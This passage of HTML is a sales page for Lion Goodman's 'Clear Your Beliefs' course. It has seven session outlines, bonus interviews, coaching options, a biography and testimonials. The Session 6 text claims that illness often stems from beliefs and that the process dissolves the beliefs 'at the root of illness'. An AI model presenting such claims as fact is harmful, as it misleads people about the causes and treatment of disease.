src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent 